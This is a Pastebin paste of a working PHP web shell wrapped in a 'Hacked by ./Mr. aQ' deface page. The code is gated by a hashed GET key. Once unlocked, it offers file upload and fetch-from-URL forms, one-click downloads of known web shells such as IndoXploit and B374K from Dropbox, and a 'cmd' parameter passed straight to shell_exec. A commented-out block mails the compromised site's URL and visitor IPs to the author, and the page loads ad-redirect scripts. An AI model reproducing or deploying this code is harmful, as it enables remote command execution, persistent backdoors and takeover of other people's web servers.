Advertisement
EddieKidiw

Hacked by ./Mr. aQ

Apr 25th, 2017
846
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 11.04 KB | None | 0 0
  1. <script type="text/javascript">
  2. function load(){
  3.   window.location.href = "http://go.ad2upapp.com/afu.php?id=1058452";
  4. }
  5. </script>
  6. </head>
  7. <?php
  8. /*
  9.  * Author: ./Mr. aQ.
  10.  * e-Mail: [email protected]
  11.  * Fb: https://fb.com/DhaLoVa
  12. v64
  13.  * Twiter, IG: @vashaamrullah
  14.  * @Last Update: 16 January 2017.
  15. */
  16.  
  17. //Settings.
  18. $mode = 1;
  19. $keys[] = "c6ec413a86efe3a6698465f82ddf108e";
  20. $keys[] = "331243a988eff4f5e01bf321805828a7";
  21.  
  22. set_time_limit(0);
  23. error_reporting(0);
  24. ini_set('display_errors', 0);
  25. ini_set('output_buffering', 0);
  26. ini_set('memory_limit', '64M');
  27.  
  28. $wget[] = array('DM Shell', 'dm404', '.links.php', 'https://dl.dropbox.com/s/vctcpsug35b5f8m/dm404.php', 0600);
  29. $wget[] = array('IndoXploit', 'idbx', '404.php', 'https://dl.dropbox.com/s/b3sjq7y7luramfe/IndoXploit%20404.php', 0600);
  30. $wget[] = array('B374K 2.8', 'becak', 'xml.php', 'https://dl.dropbox.com/s/t5vaxymk3auxg4v/b374k.php', 0600);
  31. $wget[] = array('PHProxy', 'proxi', '.php', 'https://dl.dropbox.com/s/zpy6caf8v9997jz/proxy.php', 0755);
  32. $wget[] = array('CGIProxy', 'cgi', '.pl', 'https://dl.dropbox.com/s/c11v2bds43ug5jc/proxy.cgi', 0755);
  33.  
  34. function get_req($name, $value=''){
  35.   if (isset($_REQUEST[$name])) $value=$_REQUEST[$name];
  36.   return $value;
  37. }
  38.  
  39. function w_wget($array){
  40.   if (is_file($array[2])){
  41.     $tanggal = date("F d Y H:i:s", filemtime($array[2]));
  42.     if (file_get_contents($array[2]) === file_get_contents($array[3])){
  43.       echo $array[2]." already created at $tanggal, <a href='".$array[2]."'>Go to here to open ".$array[2]."</a><br/>";
  44.       return;
  45.     }
  46.     else{
  47.       if (rename($array[2], get_name($array[2]))) return w_wget($array);
  48.       else unlink($array[2]);
  49.     }
  50.   }
  51.   $result = put_cont($array[3], $array[2]);
  52.   chmod($array[2], $array[4]);
  53.   echo $result;
  54.   return;
  55. }
  56.  
  57. function put_cont($url, $nama = ""){
  58.   $result = "";
  59.   if ($url){
  60.     if (!$nama){$nama = basename($url);}
  61.     if ($contents = file_get_contents($url)){
  62.       if ($fp = fopen($nama, 'w')){
  63.         $result = "Writing $nama<br/>";
  64.         if (fwrite($fp, $contents)){
  65.           $result .= "$nama already written.<br/>";
  66.           if (fclose($fp)){
  67.             $result .= "The writing has been completed without any problems.<br/><a href='$nama'>Go to here to open $nama</a>";
  68.           }
  69.           else{
  70.             $result .= "The writing has been completed. but we found a little problem. <a href='$nama'>Please check $nama manually.</a><br/>";
  71.           }
  72.         }
  73.         else{
  74.           $result .= "Error writing.<br/>";
  75.           if (fclose($fp)) $result .= "All proccesses have been aborted.<br/>";
  76.           if (is_file($nama)){
  77.             if (unlink($nama)) $result .= "The cache is cleared.<br/>";
  78.           }
  79.         }
  80.       }
  81.     }
  82.     else $result .= "Failed to open the URL.<br/>";
  83.   }
  84.   else $result .= "Please input an URL.";
  85.   if ($result){ return $result; }
  86.   else { return "Unkown Error<br/>"; }
  87. }
  88.  
  89. function get_name($name){
  90.   $chg = false;
  91.   $orig = $name;
  92.   $info = pathinfo($name);
  93.   $newname = '';
  94.   if(is_file($name)){
  95.     $chg = 1;
  96.     $count = 1;
  97.     while($chg){
  98.       $newname = $info['filename'].'_'.$count.'.'.$info['extension'];
  99.       if(is_file($newname)){
  100.         $newname = $orig;
  101.         $count++;
  102.       }
  103.       else{
  104.         $chg = false;
  105.       }
  106.     }
  107.   }
  108.   else{
  109.     $newname = $orig;
  110.   }
  111.   return $newname;
  112. }
  113.  
  114. function get_mode($mode, $keys){
  115.   $result = 0;
  116.   if($mode){
  117.     if(isset($_GET)){
  118.       foreach($_GET as $key => $value){
  119.         $key = md5($key);
  120.         $value = md5($value);
  121.         if($key == $keys[0] and $value == $keys[1]) $result = 1;
  122.       }
  123.     }
  124.   }
  125.   else{
  126.     $result = 1;
  127.   }
  128.   return $result;
  129. }
  130.  
  131. $aman = get_mode($mode, $keys);
  132. $pass = md5('5t4lk_f');
  133.  
  134. if ($aman) define(aku, "Sodox's");
  135. else define(aku, "Hacked" );
  136. ?>
  137. <!doctype html>
  138. <html>
  139. <head>
  140.   <title><?php echo aku." by ./Mr. aQ"; ?></title>
  141.   <script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1018576"></script>
  142.   <meta content="text/html; charset=utf-8">
  143.   <meta name="keywords" content="Daur Ulang Manusia Creation" />
  144.   <meta name="description" content="Hacked by ./Mr. aQ" />
  145.   <meta name="author" content="./Mr. aQ" />
  146.   <link rel="SHORTCUT ICON" href="http://aku-v64.mobie.in/images/im-ssory.jpg">
  147.   <link rel="stylesheet" type="text/css" href="http://aku-v64.mobie.in/script/css/family.css" media="all,handheld"/>
  148. </head>
  149. <p><marquee><font color='#FF0059'>W</font><font color='#FF003B'>E</font><font color='#FF001B'> </font><font color='#FF0600'>A</font><font color='#FF2700'>R</font><font color='#FF4400'>E</font><font color='#FE5E00'> </font><font color='#FE7800'>N</font><font color='#FF9200'>O</font><font color='#FFAC00'>T</font><font color='#FEC700'> </font><font color='#FFE600'>J</font><font color='#F5FE00'>U</font><font color='#D4FF00'>S</font><font color='#B5FE00'>T</font><font color='#97FF00'> </font><font color='#79FF00'>A</font><font color='#5BFF00'> </font><font color='#3AFF00'>T</font><font color='#16FF00'>E</font><font color='#00FF11'>A</font><font color='#00FF36'>M</font><font color='#00FE57'>.</font><font color='#00FF76'> </font><font color='#00FF94'>B</font><font color='#00FFB1'>U</font><font color='#00FFD0'>T</font><font color='#00FFF1'> </font><font color='#00E9FF'>W</font><font color='#00CBFF'>E</font><font color='#00AFFF'> </font><font color='#0095FF'>A</font><font color='#007BFF'>R</font><font color='#0062FF'>E</font><font color='#0047FF'> </font><font color='#002AFF'>A</font><font color='#000BFF'> </font><font color='#1700FF'>F</font><font color='#3700FF'>A</font><font color='#5600FF'>M</font><font color='#7300FF'>I</font><font color='#9100FF'>L</font><font color='#B100FF'>Y</font><font color='#D300FE'>.</font></marquee></p>
  150.  
  151. <div class='main'>
  152.   <a href="http://fb.com/DhaLoVa.v64"><?php echo aku; ?></a><br/>
  153.   <sub>Powered By B'N-IDB Family</sub>
  154.   <br/><br/>
  155.   <p id="mg">
  156.     <a title="./Mr. aQ">
  157.       <div align='center'>
  158.         <table width='100%' border='0'>
  159.           <tr>
  160.             <td align='center'><img src= "http://i.imgur.com/OVkvDjt.png" height="200" width="200" /></td>
  161.             <td align='center'><img src="http://aku-v64.mobie.in/images/b-n.jpg" height='200' width='200'/></td>
  162.             <td align='center'><img src="http://goenk.wapgem.com/idb.png" height='200' width='200'/></td>
  163.           </tr>
  164.         </table>
  165.       </div>
  166.     </a>
  167.   </p>
  168. </div>
  169.  
  170. <?php
  171. header('Content-Type: text/html; charset=UTF-8');
  172. if($aman){
  173. ?>
  174. <center>
  175. <br/><br/>
  176. <table style="width:100%;">
  177. <tr><td>
  178.   <form method='POST' enctype='multipart/form-data'>
  179.   <h2>Upload From Computer:</h2>
  180.   <table style="width:100%; border:0;">
  181.     <tbody>
  182.       <tr style="width:100%;">
  183.         <td style="width:10%; border:0;">File:</td>
  184.         <td style="width:90%; border:0;"><input style="width:80%;" class='toolsInp' type='file' name='ff'/></td>
  185.       </tr>
  186.       <tr>
  187.         <td style="width:10%; border:0;">Name:</td>
  188.         <td style="width:90%; border:0;"><input style="width:80%;" class='toolsInp' name='fname' placeholder='newfile.php'/></td>
  189.       </tr>
  190.     </tbody>
  191.     <tfoot>
  192.       <tr>
  193.         <td style="border:0; width:10%">&nbsp;</td>
  194.         <td style="width:90%; border:0;"><input style="width:15%;" type="submit" name="uploader" class='button' style='width: 75%' value='Upload'></td>
  195.       </tr>
  196.     </tfoot>
  197.   </table>
  198.   </form>
  199.   <hr/>
  200.   <form action='' method='POST'>
  201.   <h2>Upload From Internet:</h2>
  202.   <table style="width:100%; border:0;">
  203.     <tbody>
  204.       <tr style="width:100%;">
  205.         <td style="width:10%; border:0;">URL:</td>
  206.         <td style="width:90%; border:0;"><input style="width:80%;" class='toolsInp' name='ffurl' placeholder='http://idb-alvi.com/idb-sell.zip'/></td>
  207.       </tr>
  208.       <tr>
  209.         <td style="width:10%; border:0;">Name:</td>
  210.         <td style="width:90%; border:0;"><input style="width:80%;" class='toolsInp' name='nurl' placeholder='newfile.php'></td>
  211.       </tr>
  212.     </tbody>
  213.     <tfoot>
  214.       <tr>
  215.         <td style="border:0; width:10%">&nbsp;</td>
  216.         <td style="width:90%; border:0;"><input style="width:15%;" type="submit" name="uploaderi" class='button' style='width: 75%' value='Upload'></td>
  217.       </tr>
  218.     </tfoot>
  219.   </table>
  220. </td></tr>
  221. </table>
  222. <br/><br/>
  223. <span>Tools:</span><br/>
  224. <table>
  225. <tr>
  226. <?php
  227.  
  228. foreach($wget as $tools){
  229.   echo "<td><input class='button' type='submit', name='$tools[1]' value='$tools[0]'>";
  230. }
  231. ?>
  232. </tr>
  233. </table>
  234. </form>
  235.  
  236. <?php
  237. echo "<div class='result'><font color='aqua'>";
  238. if (get_req("uploader")){
  239.   if (!$_FILES['ff']["error"]){
  240.     $ffile = $_FILES['ff'];
  241.     $ftmp = $ffile['tmp_name'];
  242.     $fname = $ffile['name'];
  243.     $fsize = $ffile['size'];
  244.     $bite = 'b';
  245.     if($fsize > 1024){
  246.       $bite = "KB";
  247.       $fsize = $fsize / 1024;
  248.       $fsize = round($fsize, 3);
  249.     }
  250.     if($fsize > 1024){
  251.       $bite = "MB";
  252.       $fsize = $fsize / 1024;
  253.       $fsize = round($fsize, 2);
  254.     }
  255.  
  256.     if ($_POST['fname']) $fname=$_POST['fname'];
  257.     echo "| Tmp: $ftmp <br/>";
  258.     echo "| Name: $fname <br/>";
  259.     echo "| Size: $fsize $bite<br/>";
  260.     if (copy($ftmp, $fname)){
  261.       echo "| Status: Uploaded<br/>";
  262.       chmod($fname, 0755);
  263.       echo "Go to <a href=$fname target=_blank>Here</a>";
  264.     }
  265.     else {
  266.       echo "| Status: Not Uploaded<br/>";
  267.     }
  268.     echo "<br/><br/>";
  269.   }
  270. }
  271.  
  272. if(get_req('uploaderi')){
  273.   if (get_req('ffurl')){
  274.     $url = get_req('ffurl');
  275.     $nama = "";
  276.     if (get_req('nurl')){ $nama = get_req('nurl'); }
  277.     $result = put_cont($url, $nama);
  278.     echo $result;
  279.   }
  280. }
  281.  
  282. // wget handle.
  283. foreach($wget as $tools){
  284.   if(get_req($tools[1])){
  285.     w_wget($tools);
  286.   }
  287. }
  288.  
  289. // Cmd executor;
  290. if(get_req('cmd')){
  291.   if(function_exists('shell_exec')){
  292.     $cmn = get_req('cmd');
  293.     $cmd = shell_exec(urldecode($cmn));
  294.     echo "<pre>$cmd</pre><br/>";
  295.   }
  296. }
  297. echo "</font></div>";
  298. echo "</center>";
  299. }
  300. /*
  301. @ini_set('output_buffering', 0);
  302. @ini_set('display_errors', 0);
  303. set_time_limit(0);
  304. ini_set('memory_limit', '64M');
  305. header('Content-Type: text/html; charset=UTF-8');
  306. $idb2 = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  307. $idb3 = "Setoran Juragan:
  308. Posisi: $idb2
  309. IP Addr: " . $_SERVER['REMOTE_ADDR'];
  310. mail($idb1, "Tetep Ganteng", $idb3, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
  311. */
  312. ?>
  313. <article>
  314.   <div style="text-align: left">
  315.     <table>
  316.       <tr>
  317.         <td><font face="Trajan Pro" size="4" color="#555" style="text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black">MY FAMILY:</font></td>
  318.         <td><marquee>| ./Mr. aQ | ./KEFIEX404 | MANIAK KASUR | MR.K | EL-RO | ANTONIO HsH | TUAN GALAU | DEDEMIT ID | NO SCRIPT 404 | K3C0T | SIM0D |</marquee></td>
  319.       </tr>
  320.     </table>
  321.   </div>
  322. </article>
  323. <div onload="load()" class="footer">Copyright &copy; <?php echo date('Y'); ?><a href="http://facebook.com/DhaLoVa.v64"> ./Mr. aQ B'N-IDB Family.</a> All Rights Reserved.</div>
  324. <embed src="http://www.youtube.com/v/ThwSWIXhiRw&amp;autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">
  325. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement